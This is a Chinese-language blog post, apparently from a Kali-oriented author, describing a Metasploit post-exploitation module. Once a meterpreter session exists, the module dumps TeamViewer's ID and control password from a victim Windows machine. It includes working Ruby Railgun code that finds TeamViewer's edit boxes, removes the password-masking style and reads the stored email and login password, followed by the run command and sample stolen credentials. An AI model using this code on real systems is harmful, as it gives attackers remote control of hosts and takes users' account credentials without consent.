• Get TeamViewer ID and Password


    Dump TeamViewer ID and Password

    前言

    有时候会遇到目标主机安装有TeamViewer,在这种情况下一般会上传一个编译好的程序读取ID和控制密码,这样就可以连接上TeamViewer进而控制目标主机的屏幕操作,管理文件和连接VPN等等。

    Metasploit中没有模块可以读取TeamViewer的ID和控制密码。我决定创建一个Metasploit模块,这个模块可以读取Teamviewer的ID和控制密码,如果登录窗口存在密码还会读取Email和登录密码。

    怎么做

    首先,这个模块使用了Metasploit中的Railgun功能,加载Windows内置动态链接库中的User32.dll并调用一些窗口函数,通过枚举窗口的信息,找到ID和控制密码的编辑框的句柄,然后发送Windows消息得到编辑框里的文本内容。

    获取Teamviewer的主窗口句柄,一开始是通过FindWindows函数查找窗口标题得到窗口的句柄,但是在不同的主机里的系统语言可能不一样,这里考虑了兼容性,所以我使用了读取注册表"HKEY_CURRENT_USER\Software\TeamViewer"中的MainWindowHandle值作为主窗口的句柄。

    获取ID和控制密码的代码:

    # EnumWindows Function not work in RailGun, I don't know how to define the lpEnumFunc parameter
    def enum_id_and_password(hwnd_main)
      hwnd_mwrcp = client.railgun.user32.FindWindowExW(hwnd_main, nil, 'MainWindowRemoteControlPage', nil)
      hwnd_irccv = client.railgun.user32.FindWindowExW(hwnd_mwrcp['return'], nil, 'IncomingRemoteControlComponentView', nil)
      hwnd_custom_runner_id = client.railgun.user32.FindWindowExW(hwnd_irccv['return'], nil, 'CustomRunner', nil)
      hwnd_custom_runner_pass = client.railgun.user32.FindWindowExW(hwnd_irccv['return'], hwnd_custom_runner_id['return'], 'CustomRunner', nil)
      #  find edit box handle
      hwnd_id_edit_box = client.railgun.user32.FindWindowExW(hwnd_custom_runner_id['return'], nil, 'Edit', nil)
      print_status("Found handle to ID edit box #{hwnd_id_edit_box['return'].to_s(16).rjust(8, '0')}")
      hwnd_pass_edit_box = client.railgun.user32.FindWindowExW(hwnd_custom_runner_pass['return'], nil, 'Edit', nil)
      print_status("Found handle to Password edit box #{hwnd_pass_edit_box['return'].to_s(16).rjust(8, '0')}")
      #  get window text
      if hwnd_id_edit_box['return'] && hwnd_pass_edit_box['return']
        print_good("ID: #{get_window_text(hwnd_id_edit_box['return'])}")
        print_good("PASSWORD: #{get_window_text(hwnd_pass_edit_box['return'])}")
      else
        print_error('Handle for TeamViewer ID or password edit box not found')
      end
    end
    

    获取Email和登录密码的代码:

    def enum_email_and_password(hwnd_main)
      hwnd_lp = client.railgun.user32.FindWindowExW(hwnd_main, nil, 'LoginPage', nil)
      hwnd_lfv = client.railgun.user32.FindWindowExW(hwnd_lp['return'], nil, 'LoginFormView', nil)
      #  find edit box handle
      hwnd_email_edit_box = client.railgun.user32.FindWindowExW(hwnd_lfv['return'], nil, 'Edit', nil)
      print_status("Found handle to Email edit box #{hwnd_email_edit_box['return'].to_s(16).rjust(8, '0')}")
      hwnd_pass_edit_box = client.railgun.user32.FindWindowExW(hwnd_lfv['return'], hwnd_email_edit_box['return'], 'Edit', nil)
      print_status("Found handle to Password edit box #{hwnd_pass_edit_box['return'].to_s(16).rjust(8, '0')}")
      #  Remove ES_PASSWORD style
      #  https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowlongw
      #  https://docs.microsoft.com/en-us/windows/win32/controls/edit-control-styles
      #  GWL_STYLE  -16
      client.railgun.user32.SetWindowWord(hwnd_pass_edit_box['return'], -16, 0)
      #  get window text
      if hwnd_email_edit_box['return'] && hwnd_pass_edit_box['return']
        print_good("EMAIL: #{get_window_text(hwnd_email_edit_box['return'])}")
        print_good("PASSWORD: #{get_window_text(hwnd_pass_edit_box['return'])}")
      else
        print_error('Handle for TeamViewer ID or Password edit box not found')
      end
    end
    

    因为再Railgun中EnumChildWindows有一个参数是要重载EnumChildProc方法的,Metasploit做不到,也不是做不到,应该说比较麻烦,要在进程中申请一段有执行权限的内存,再把这个函数的shellcode写到这个地址,才能使用EnumChildWindows去调用这个方法,所以我就换为了FindWindowExW一层一层的找,还好Teamviewer编辑框的窗口类名都是不变的,使得这个方法可行。

    找到编辑框的句柄之后就要获取编辑框里面的内容了,用C语言可以调用GetWindowTextW函数,但是在Metasploit又是行不通的,Railgun中这个函数有一个lpString参数是返回值,目前我还没找到调用他的方法。

    所以我写了一个函数获取Windows标题:

    def get_window_text(window_hwnd)
      if window_hwnd
        addr = session.railgun.util.alloc_and_write_wstring('Kali-Team')
        client.railgun.user32.SendMessageW(window_hwnd, 'WM_GETTEXT', 1024, addr)
        text = session.railgun.util.read_wstring(addr)
        client.railgun.multi([
          ['kernel32', 'VirtualFree', [addr, 0, MEM_RELEASE]],
        ])
        if text == ''
          return 'The content of this edit box is empty'
        else
          return text
        end
      else
        return nil
      end
    end
    

    模块使用

    当你得到一个meterpreter会话的时候,可以直接执行该模块

    meterpreter > run post/windows/gather/credentials/teamviewer_id_pwd 
    
    [*] TeamViewer's language setting options are 'en'
    [*] TeamViewer's version is '15.3.2682 '
    [+] The PID of TeamViewer's process has been found to be  3188.
    [+] TeamViewer's  title is 'TeamViewer'
    [*] Found handle to ID edit box 00010596
    [*] Found handle to Password edit box 0001059c
    [+] ID: 1 561 912 659
    [+] PASSWORD: 718xuu
    [*] Found handle to Email edit box 0001054c
    [*] Found handle to Password edit box 00010554
    [+] EMAIL: kali-team@qq.com
    [+] PASSWORD: MyPassword.
    meterpreter > 
    

  • 相关阅读:
    04-26mysql命令(数据库操作层级,建表,对表的操作)
    mysql 建表和查询 大全 (待补全)
    04-21数据操作
    4-20 mysql 整理 (建表语句和mysql命令)
    MySql 初步整理
    初识jQuery 基础篇 借鉴版
    jQuery基础整理!!
    JS节点操作 (表格在js中添加行和单元格,并有一个删除键)
    一阶段项目结尾整理
    Css 分类 属性 选择器
  • 原文地址:https://www.cnblogs.com/Kali-Team/p/12468066.html
Copyright © 2020-2023  润新知